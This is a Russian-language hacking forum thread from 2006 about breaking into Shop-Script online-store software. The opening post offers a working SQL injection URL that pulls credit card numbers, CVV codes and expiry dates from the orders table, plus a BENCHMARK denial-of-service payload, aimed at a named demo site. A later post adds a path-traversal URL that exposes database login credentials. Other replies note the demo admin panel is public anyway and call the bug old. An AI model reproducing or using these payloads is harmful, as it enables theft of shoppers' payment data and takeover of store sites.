ShopScript доступ в админ панель

Discussion in 'Уязвимости' started by »Atom1c«, 5 Nov 2006.

Thread Status:
Not open for further replies.
  1. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
    http://адрес/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires,cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
    То вы сможете попасть в админку:)Если Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
    Также возможно проведение DDos атаки путём
    http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))

    Вот пример сайта:)
    http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires,cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
    Только тут включён SafeMod:(
     
    #1 »Atom1c«, 5 Nov 2006
    Last edited: 5 Nov 2006
    1 person likes this.
  2. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Похоже, что не ты нашел уязвимости..
     
  3. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Я тока насчёт DDos нашёл, а про админку я где-то в сети прочитал.Может кончно DDos уже раньше нашли)
     
  4. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Может я туплю, но доступ в админку есть и так - http://www.shop-script-demo.com/pro/admin.php
    Как я понял это как бы демонстрация этого самого скрипта...показывается как выглядит там админка...и все...
    Поправьте, если ошибаюсь...
     
  5. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Хм...Да, наверно.А то чёто я смотрю больше на другие сайты так не входит
     
  6. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Вот и я про тоже )
    А жаль...искренне жаль )
    Тему предлагаю закрыть...
     
  7. S7iL3t

    S7iL3t Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    42
    Likes Received:
    26
    Reputations:
    30
    /me пацталом %)))
     
  8. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    жжёте парни...
     
  9. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    баянчег http://www.cyberlords.net/advisories/cl_shop.txt
     
  10. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Короче, единственное что я смог найти, так это данные для подключения к БД, если очень повезёт они могут подойти и к админке.
    Надо только дописать
    /index.php?aux_page=../cfg/connect.inc.php
    Если вы перейдёте на это страничку но ничего не будет написано( если будет написано "документ не найден на сервере" то ничего не плучится) если ничего не будет, будет просто пусто на том месте где должны быть ньюски, то просто посмотрите сорцы, там будет часть кода типа
    db_username=""
    bd_password=""
    и т.д.:)
     
  11. И.Г.

    И.Г. Elder - Старейшина

    Joined:
    29 Aug 2006
    Messages:
    336
    Likes Received:
    343
    Reputations:
    111
    С журнала Хакер вроде инфа... там даже видео было
     
Thread Status:
Not open for further replies.